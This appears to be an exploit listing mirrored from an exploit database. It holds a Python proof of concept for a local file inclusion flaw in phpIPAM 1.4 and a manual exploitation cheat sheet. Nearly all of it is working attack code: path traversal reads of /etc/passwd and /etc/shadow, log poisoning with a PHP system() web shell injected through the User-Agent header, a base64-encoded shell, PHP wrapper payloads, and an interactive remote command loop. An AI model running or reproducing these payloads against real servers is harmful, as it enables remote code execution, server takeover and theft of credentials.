Share
## https://sploitus.com/exploit?id=PACKETSTORM:215599
phpIPAM 1.4 LFI to RCE Exploit
    
    
    =============================================================================================================================================
    | # Title     : phpIPAM 1.4 LFI to RCE Exploit
                                                                        |
    | # Author    : indoushka
                                                                       |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2
    (64 bits)                                                            |
    | # Vendor    : https://github.com/phpipam/phpipam/blob/master/index.php
                                                                      |
    
    =============================================================================================================================================
    
    [+] Summary : A critical Local File Inclusion (LFI) vulnerability exists
    in phpIPAM's main index.php file due to insufficient input validation
                  when including page files. Attackers can exploit this to
    read sensitive system files, potentially escalate to Remote Code Execution
    (RCE),
                            and gain complete control of the server.
    
    
    [+]  POC : python poc.py
    
    #!/usr/bin/env python3
    """
    phpIPAM LFI to RCE Exploit
    """
    
    import requests
    import sys
    import urllib.parse
    
    class phpIPAM_Exploit:
        def __init__(self, target):
            self.target = target.rstrip('/')
            self.session = requests.Session()
    
        def check_lfi(self, path):
            """اختبار تضمين الملفات"""
            params = {'page': path}
            response = self.session.get(f"{self.target}/index.php",
    params=params)
            return response
    
        def exploit_proc_self_environ(self):
            """استغلال /proc/self/environ"""
            print("[*] Testing /proc/self/environ LFI...")
    
            # أولاً: حقن PHP في User-Agent
            headers = {
                'User-Agent': '<?php system($_GET["cmd"]); ?>'
            }
    
            response = self.session.get(self.target, headers=headers)
    
            # ثانياً: تضمين ملف السجل
            log_paths = [
                '/var/log/apache2/access.log',
                '/var/log/httpd/access_log',
                '/var/log/nginx/access.log',
                '/proc/self/environ',
                '/proc/self/fd/0'
            ]
    
            for path in log_paths:
                print(f"[*] Trying {path}...")
                response = self.check_lfi(f"../../../../{path}")
    
                if 'PHP' in response.text or 'php' in response.text:
                    print(f"[+] Possible LFI found: {path}")
    
                    # اختبار تنفيذ الأوامر
                    cmd_response = self.session.get(
                        f"{self.target}/index.php",
                        params={'page': f'../../../../{path}', 'cmd':
    'whoami'}
                    )
    
                    if cmd_response.status_code == 200:
                        print("[+] RCE successful!")
                        return True
    
            return False
    
        def upload_and_include(self, php_code):
            """رفع وتضمين ملف مؤقت (إذا كان هناك رفع ملفات)"""
            # هذا يتطلب ثغرة رفع ملفات أيضًا
            print("[*] Trying to upload and include PHP file...")
    
            # PHP shell base64 encoded
            shell = "<?php echo
    base64_decode('PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4='); ?>"
    
            # محاولة تضمين ملفات /tmp
            tmp_files = [
                '/tmp/sess_*',
                '/tmp/php*',
                '/tmp/upload*'
            ]
    
            for pattern in tmp_files:
                for i in range(100):
                    filename = pattern.replace('*', str(i))
                    response = self.check_lfi(f"../../../../{filename}")
                    if 'uid=' in response.text or 'root' in
    response.text.lower():
                        print(f"[+] Found vulnerable temp file: {filename}")
                        return filename
    
            return None
    
        def interactive_shell(self, lfi_path):
            """قشرة تفاعلية بعد الاستغلال"""
            print(f"\n[+] Interactive shell via LFI: {lfi_path}")
            print("[+] Type 'exit' to quit\n")
    
            while True:
                cmd = input("shell").strip()
                if cmd.lower() == 'exit':
                    break
    
                params = {
                    'page': f'../../../../{lfi_path}',
                    'cmd': cmd
                }
    
                response = self.session.get(f"{self.target}/index.php",
    params=params)
    
                # استخراج الناتج
                lines = response.text.split('\n')
                for line in lines:
                    if line and not line.startswith(('<', '<?', '<!')) and
    'html' not in line.lower():
                        print(line[:500])  # طباعة أول 500 حرف
    
        def run(self):
            """تشغيل الاستغلال"""
            print("[*] phpIPAM LFI/RFI Exploit")
            print(f"[*] Target: {self.target}")
    
            # اختبار LFI أساسي
            test_files = [
                '../../../../etc/passwd',
                '../../../../etc/hosts',
                '../../../../windows/win.ini',
                '....//....//....//....//etc/passwd',
                '..\\..\\..\\..\\windows\\win.ini'
            ]
    
            for test in test_files:
                print(f"[*] Testing: {test}")
                response = self.check_lfi(test)
    
                if 'root:' in response.text or '[extensions]' in
    response.text:
                    print(f"[+] LFI confirmed with: {test}")
                    print(f"[+] Response preview: {response.text[:200]}")
    
                    # استغلال مباشر
                    self.interactive_shell(test.replace('../../../../', ''))
                    return True
    
            # محاولات أخرى
            if self.exploit_proc_self_environ():
                return True
    
            print("[-] No LFI vulnerability found")
            return False
    
    # استغلال يدوي
    def manual_exploitation():
        print("""
    === phpIPAM LFI/RFI Manual Exploitation ===
    
    1. Basic LFI Test:
       /index.php?page=../../../../etc/passwd
       /index.php?page=../../../../etc/shadow
       /index.php?page=../../../../windows/win.ini
    
    2. Log Poisoning:
       # Step 1: Inject PHP into logs
       GET /index.php HTTP/1.1
       User-Agent: <?php system($_GET['cmd']); ?>
    
       # Step 2: Include the log file
       /index.php?page=../../../../var/log/apache2/access.log&cmd=id
    
    3. PHP Filters (if enabled):
       /index.php?page=php://filter/convert.base64-encode/resource=config.php
       /index.php?page=php://filter/resource=/etc/passwd
    
    4. Data URI (if allow_url_include=On):
       /index.php?page=data://text/plain,<?php phpinfo();?>
    
    /index.php?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=
    
    5. Expect Wrapper (rare):
       /index.php?page=expect://ls
        """)
    
    if __name__ == "__main__":
        if len(sys.argv) != 2:
            print("Usage: python3 phpipam_exploit.py <target_url>")
            print("Example: python3 phpipam_exploit.py
    http://localhost/phpipam")
            manual_exploitation()
            sys.exit(1)
    
        target = sys.argv[1]
        exploit = phpIPAM_Exploit(target)
        exploit.run()
    
    
    Greetings to
    :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln
    (John Page aka hyp3rlinx)|
    
    ===================================================================================================